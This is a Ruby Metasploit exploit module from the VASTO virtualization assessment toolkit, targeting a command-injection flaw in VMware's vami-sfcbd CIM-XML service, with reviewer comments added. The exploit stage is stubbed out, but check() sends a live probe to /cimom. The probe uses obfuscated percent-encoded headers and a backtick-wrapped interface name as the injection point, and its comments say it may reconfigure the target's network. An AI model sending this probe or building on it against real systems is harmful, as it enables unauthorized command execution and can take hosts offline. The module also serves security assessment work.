vmware_sfcbd_exec.rb
#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
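class Metasploit3 < Msf::Exploit::Remote
  # send_request_raw, the RPORT/VHOST defaults and socket handling all come from
  # the HttpClient mixin. The original included only Tcp and then called
  # send_request_raw, which Tcp does not provide, so check() could never have
  # run; HttpClient also opens and closes its own connection per request, so the
  # bare connect() (which was never paired with a disconnect) is gone.
  include Msf::Exploit::Remote::HttpClient

  # Response body pattern taken as "method call returned 0" (success).
  CHECK_SUCCESS_RE = /<VALUE>0<\/VALUE>/

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'VMware VAMI-sfcbd remote command exec',
      'Description' => %q{
This module exploits an arbitrary command execution flaw in
the vami-sfcbd module shipped with VMware Studio (and appliances built with it) and VMware Data Recovery.
NOTE: this module is not working at the moment. The exploit code is there, but it has not yet been weaponized.
},
      'License'     => GPL_LICENSE,
      'Version'     => '0.1',
      'Privileged'  => false,
      'Arch'        => ARCH_CMD,
      'Payload'     =>
        {
          'Space'       => 512,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet',
            }
        },
      'Targets'     =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget' => 0))

    # vami-sfcbd's CIM-XML listener; only the port is exposed as an option.
    register_options(
      [
        Opt::RPORT(5488)
      ], self.class)
  end

  # Probe the target by POSTing a CIM-XML MethodCall to /cimom and looking for a
  # zero return value in the body.
  #
  # Returns Exploit::CheckCode::Vulnerable when the response body contains
  # <VALUE>0</VALUE>, ::Safe on any other response, and ::Unknown when the host
  # does not answer (timeout or connection error).
  #
  # NOTE(review): the probe invokes VAMI_NetworkSetting.SetStaticNetworkSetting
  # with Address/Gateway 1.1.1.1 and SubnetMask 255.255.255.0. If that call is
  # honoured by a vulnerable appliance it may actually reconfigure eth0 and drop
  # the host off the network -- this is an intrusive check, not a passive one.
  # Confirm against a lab target before relying on it; a read-only CIM method
  # would be the safer probe.
  def check
    begin
      res = send_request_raw({
        'uri'     => '/cimom',
        'method'  => 'POST',
        'data'    => check_request,
        # Content-Length is filled in by the HTTP client from 'data', so it is
        # not set by hand here (the original computed data.length itself).
        'headers' =>
          {
            'Content-Type'       => 'application/xml; charset="utf-8"',
            'CIMProtocolVersion' => '1.0',
            'CIMOperation'       => 'MethodCall',
            # Percent-encoded; decodes to
            #   root/cimv2:VAMI_NetworkSetting.Name="eth0",ServerName="AAAA"
            # Note the header carries a plain eth0 while the XML body's Name key
            # is wrapped in backticks (see check_request).
            'CIMObject'          => '%72%6F%6F%74/%63%69%6D%762%3A%56%41%4D%49_%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67.%4E%61%6D%65%3D%22%65%74%680%22%2C%53%65%72%76%65%72%4E%61%6D%65%3D%22%41%41%41%41%22',
            # Decodes to SetStaticNetworkSetting.
            'CIMMethod'          => '%53%65%74%53%74%61%74%69%63%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67'
            # The original kept a commented-out 'Authorization: Basic ...' header
            # here with a hard-coded root credential baked in. It has been
            # dropped: if a target requires HTTP Basic auth on /cimom, expose the
            # username/password as module options instead of embedding them.
          }
      }, 25)
    rescue ::Rex::ConnectionError => e
      print_error("Connection failed: #{e.message}")
      return Exploit::CheckCode::Unknown
    end

    # send_request_raw returns nil on timeout / no response.
    if res.nil?
      print_error('No response from target')
      return Exploit::CheckCode::Unknown
    end

    # The original tested an undefined variable (resp instead of res), so this
    # branch was unreachable and every host was reported Safe.
    if res.body =~ CHECK_SUCCESS_RE
      vprint_status("Response: #{res.body.strip}")
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Exploitation is not implemented yet (see the module description); say so
  # instead of silently returning.
  def exploit
    #TBD
    print_error('Exploit not implemented: this module currently only supports check')
  end

  private

  # CIM-XML MethodCall body used by check(). The Name key value is `eth0`
  # (backticks included) -- the interface name is the suspected shell-injection
  # point, which is why it is quoted that way; the request is otherwise a
  # straightforward SetStaticNetworkSetting call.
  def check_request
    [
      "<?xml version=\"1.0\" encoding=\"UTF-8\"?>",
      '<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="7" PROTOCOLVERSION="1.0">',
      '<SIMPLEREQ><METHODCALL NAME="SetStaticNetworkSetting"><LOCALINSTANCEPATH>',
      '<LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/>',
      '</LOCALNAMESPACEPATH><INSTANCENAME CLASSNAME="VAMI_NetworkSetting">',
      '<KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">`eth0`</KEYVALUE>',
      '</KEYBINDING><KEYBINDING NAME="ServerName"><KEYVALUE VALUETYPE="string">',
      '</KEYVALUE></KEYBINDING></INSTANCENAME></LOCALINSTANCEPATH>',
      '<PARAMVALUE NAME="Address" PARAMTYPE="string"><VALUE>1.1.1.1</VALUE>',
      '</PARAMVALUE><PARAMVALUE NAME="Gateway" PARAMTYPE="string">',
      '<VALUE>1.1.1.1</VALUE></PARAMVALUE><PARAMVALUE NAME="SubnetMask" PARAMTYPE="string">',
      '<VALUE>255.255.255.0</VALUE></PARAMVALUE></METHODCALL></SIMPLEREQ></MESSAGE></CIM>'
    ].join
  end
end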